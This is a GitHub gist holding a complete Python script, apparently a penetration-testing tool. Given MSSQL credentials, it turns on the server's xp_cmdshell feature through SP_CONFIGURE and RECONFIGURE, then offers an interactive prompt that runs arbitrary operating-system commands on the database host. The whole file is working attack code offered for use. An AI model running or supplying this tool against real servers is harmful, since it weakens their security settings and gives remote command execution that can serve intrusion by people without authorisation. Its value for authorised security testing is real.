Created
June 10, 2022 00:04
-
-
Save SeanPesce/b9f3b9b6b87c57bc3d1d529fe0476d68 to your computer and use it in GitHub Desktop.
Interactive pseudo-shell for executing shell commands on a remote MSSQL server via xp_cmdshell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Author: Sean Pesce | |
# This script acts as a pseudo-shell by executing shell commands on a remote MSSQL server instance | |
# using sqsh and xp_cmdshell. | |
import argparse | |
import os | |
import platform | |
import re | |
import subprocess | |
import sys | |
from cmd import Cmd | |
SQSH_URL = 'https://github.com/vonloxley/sqsh' | |
CONNECTION_ERROR_MSG = 'Failed to connect to the MSSQL server.' | |
def sqsh_installed():
    """
    Returns True if sqsh is installed.

    Runs ``sqsh --help`` with its output discarded and reports whether the
    command exited with status 0.
    https://github.com/vonloxley/sqsh
    """
    try:
        # An argv list plus subprocess.DEVNULL avoids spawning a shell and
        # removes the need to pick '/dev/null' vs 'NUL' per platform.
        completed = subprocess.run(
            ['sqsh', '--help'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            check=False,
        )
    except OSError:
        # The executable could not be started at all (e.g. not on PATH).
        return False
    return completed.returncode == 0
def output_has_connection_error(output):
    """
    Tells whether the given raw output (bytes) reports a failed connection.

    The check is a case-insensitive search for the phrase "connection failed".
    """
    marker = b'connection failed'
    normalized = output.lower()
    return normalized.find(marker) != -1
class XpCmdShell(Cmd):
    """
    Interactive pseudo-shell built on cmd.Cmd.

    Lines that do not match a built-in command (sql, exit, quit, EOF, help)
    are wrapped in an ``xp_cmdshell '...'`` statement and sent to the MSSQL
    server through the ``sqsh`` command-line client.
    """

    prompt = 'sql$ '
    intro = 'Connected to remote server.\n'

    # Class variables for cleaning up output
    # Marker echoed before and after every remote command so that the
    # command's own output can be cut out of everything else sqsh prints.
    output_delimiter = 'zZzZzZSeanPZzZzZz'
    # Runs of at least this many whitespace characters collapse to one newline.
    output_whitespace_threshold = 100

    def __init__(self, host, port, user, password, encoding='utf8'):
        """
        Stores the connection settings and builds the prompt/intro banner.

        host, user and password are passed to sqsh verbatim; port is coerced
        to int; encoding is used to decode the bytes that sqsh prints.
        """
        # Zero-argument super(): super(self.__class__, self) recurses forever
        # as soon as this class is subclassed.
        super().__init__()
        self.host = host
        self.port = int(port)
        self.user = user
        self.password = password
        self.encoding = encoding
        # Set on the instance (not the class) so that creating a second shell
        # does not overwrite the prompt/banner of the first one.
        self.prompt = f'{self.user}@{self.host} $ '
        self.intro = f'Connected to {self.host}:{self.port}\n'

    def sqsh_command_str(self, command):
        """
        Returns a string containing a shell command to execute raw SQL via sqsh

        Every argument is quoted for a POSIX shell, so credentials or SQL that
        contain spaces, quotes, '$', '&', ';' or backslashes reach sqsh
        unchanged instead of being interpreted by the shell.
        """
        import shlex  # local import: only this method needs it
        return ' '.join(shlex.quote(arg) for arg in self.sqsh_command_list(command))

    def sqsh_command_list(self, command):
        """
        Returns an argv list (for subprocess, without a shell) that executes
        raw SQL via sqsh
        """
        # No escaping is needed here: each list item is handed to sqsh as-is.
        return [
            'sqsh',
            '-P', self.password,
            '-S', f'{self.host}:{int(self.port)}',
            '-U', self.user,
            '-C', command,
        ]

    @staticmethod
    def _xp_cmdshell_sql(command):
        """
        Returns the SQL statement that passes the given command to xp_cmdshell
        """
        # Double embedded single quotes so they stay inside the SQL string
        # literal instead of terminating it early.
        escaped = command.replace("'", "''")
        return f'xp_cmdshell \'{escaped}\''

    def sqsh_xp_cmdshell_str(self, command):
        """
        Returns a string containing a shell command to execute shell commands on the remote MSSQL host via xp_cmdshell
        """
        return self.sqsh_command_str(self._xp_cmdshell_sql(command))

    def sqsh_xp_cmdshell_list(self, command):
        """
        Returns an argv list to execute shell commands on the remote MSSQL host via xp_cmdshell
        """
        return self.sqsh_command_list(self._xp_cmdshell_sql(command))

    def _execute(self, sqsh_cmd):
        """
        Runs the given sqsh argv list and returns its combined stdout/stderr
        as bytes.

        Raises AssertionError if the output reports a connection failure and
        subprocess.CalledProcessError if sqsh exits with a non-zero status.
        """
        output = subprocess.check_output(sqsh_cmd, stderr=subprocess.STDOUT)
        # Raised explicitly (rather than with an assert statement) so the
        # check survives "python -O"; the exception type is unchanged.
        if output_has_connection_error(output):
            raise AssertionError(CONNECTION_ERROR_MSG)
        return output

    def _report_error(self, err):
        """
        Prints a failure (and any output captured with it) without leaving
        the interactive loop
        """
        print(f'[ERROR] {err}')
        captured = getattr(err, 'output', None)
        if captured:
            print(captured.decode(self.encoding, errors='replace'))

    def get_xp_cmdshell_output_using_delims(self, command):
        """
        Runs a command through xp_cmdshell and returns only that command's
        output as a string.

        The command is bracketed by two ``echo <delimiter>`` calls; the text
        between the first two delimiter occurrences is kept, stripped, and has
        long whitespace runs collapsed. Raises AssertionError if the
        connection failed or the delimiter never shows up in the output.
        """
        delim = self.output_delimiter
        sqsh_cmd = self.sqsh_xp_cmdshell_list(f'echo {delim} & {command} & echo {delim}')
        # errors='replace': undecodable bytes must not abort the whole command.
        output = self._execute(sqsh_cmd).decode(self.encoding, errors='replace')
        # Isolate output using hard-coded delimiter
        if delim not in output:
            raise AssertionError(f'Failed to obtain output for command: "{command}"')
        _, _, after_first = output.partition(delim)
        # partition() keeps the whole remainder when the closing delimiter is
        # missing; slicing with find() == -1 would silently drop a character.
        body, _, _ = after_first.partition(delim)
        # Remove unnecessary whitespace
        body = body.strip()
        return re.sub(r'[ \n\r\t]{%d,}' % self.output_whitespace_threshold, '\n', body)

    def check_connection(self):
        """
        Returns True if connection to the MSSQL server succeeded
        """
        print(f'Checking connection to server {self.host}:{self.port}')
        try:
            output = subprocess.check_output(
                self.sqsh_command_list('select \'\''),
                stderr=subprocess.STDOUT,
            )
        except subprocess.CalledProcessError as err:
            # A non-zero exit whose output reports the connection failure is
            # the "not connected" answer; anything else is unexpected.
            if output_has_connection_error(err.output or b''):
                return False
            raise
        return not output_has_connection_error(output)

    def enable_xp_cmdshell(self):
        """
        Turns on 'show advanced options' and then 'xp_cmdshell' through
        SP_CONFIGURE, issuing RECONFIGURE after each change.

        Raises AssertionError if the connection fails or if the server output
        does not confirm that an option was changed.
        """
        print('Enabling xp_cmdshell')
        steps = (
            ('show advanced options', 'advanced options'),
            ('xp_cmdshell', 'xp_cmdshell'),
        )
        for option, label in steps:
            output = self._execute(self.sqsh_command_list(f'EXEC SP_CONFIGURE \'{option}\', 1'))
            if f'\'{option}\' changed from'.encode() not in output:
                raise AssertionError(
                    f'Failed to enable {label}. Try running this script again with "--no-reconfig"'
                )
            self._execute(self.sqsh_command_list('RECONFIGURE'))

    def do_exit(self, line):
        print("Exiting")
        # A true return value tells Cmd.cmdloop() to stop.
        return True

    def do_quit(self, line):
        return self.do_exit(line)

    def do_EOF(self, line):
        """Exit this shell (end of input, e.g. Ctrl-D)."""
        # Without this handler Cmd passes the literal line "EOF" to default(),
        # which would be sent to the server as a command.
        print()
        return self.do_exit(line)

    def help_exit(self):
        print('Exit this shell.')

    def help_quit(self):
        self.help_exit()

    def emptyline(self):
        """
        Prints a blank line for empty input.

        Cmd's stock emptyline() repeats the previous command, which here
        would re-run it on the remote server.
        """
        print()

    def do_sql(self, line):
        try:
            output = self._execute(self.sqsh_command_list(line))
        except (AssertionError, subprocess.CalledProcessError) as err:
            # Report and stay in the shell instead of crashing out of cmdloop().
            self._report_error(err)
            return
        print(output.decode(self.encoding, errors='replace'))

    def help_sql(self):
        print('Usage:\n\n\tsql <SQL STATEMENT>\n\nExecute a raw SQL statement on the server.')

    def default(self, line):
        """
        Default behavior: Run shell commands on the remote server via xp_cmdshell
        """
        if not line:
            print()
            return
        # Cleaner-looking output that has a (low) potential to be malformed due to the sanitization process
        try:
            output = self.get_xp_cmdshell_output_using_delims(line)
        except (AssertionError, subprocess.CalledProcessError) as err:
            # Report and stay in the shell instead of crashing out of cmdloop().
            self._report_error(err)
            return
        print(output)
if __name__ == '__main__':
    # Command-line interface
    parser = argparse.ArgumentParser(
        description='Wrapper shell for executing commands via xp_cmdshell on a Microsoft SQL (MSSQL) server.',
    )
    parser.add_argument('-H', '--host', required=True, help='MSSQL server host/IP address')
    parser.add_argument('-p', '--port', type=int, default=1433, help='MSSQL server port')
    parser.add_argument('-u', '--username', required=True, help='MSSQL server username')
    parser.add_argument('-P', '--password', required=True, help='MSSQL server password')
    parser.add_argument(
        '-n', '--no-reconfig',
        action='store_true',
        help='Disables automatic server reconfiguration to enable xp_cmdshell. Useful when the user has low privileges, but xp_cmdshell is already enabled.',
    )
    parser.set_defaults(no_reconfig=False)
    opts = parser.parse_args()

    # Every request goes through the sqsh client, so stop early without it.
    if not sqsh_installed():
        print(
            '[ERROR] sqsh is not installed. You might be able to install it with "sudo apt-get install -y sqsh"; otherwise, get it here:',
            f'\t{SQSH_URL}',
            sep='\n',
        )
        sys.exit(1)

    shell = XpCmdShell(
        host=opts.host,
        port=opts.port,
        user=opts.username,
        password=opts.password,
    )

    # Verify the credentials/endpoint before touching the server configuration.
    connected = shell.check_connection()
    if not connected:
        print(f'[ERROR] {CONNECTION_ERROR_MSG}')
        sys.exit(1)

    # Reconfiguration is skipped only when the user passed --no-reconfig.
    reconfigure = not opts.no_reconfig
    if reconfigure:
        shell.enable_xp_cmdshell()

    # Hand control to the interactive prompt.
    shell.cmdloop()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment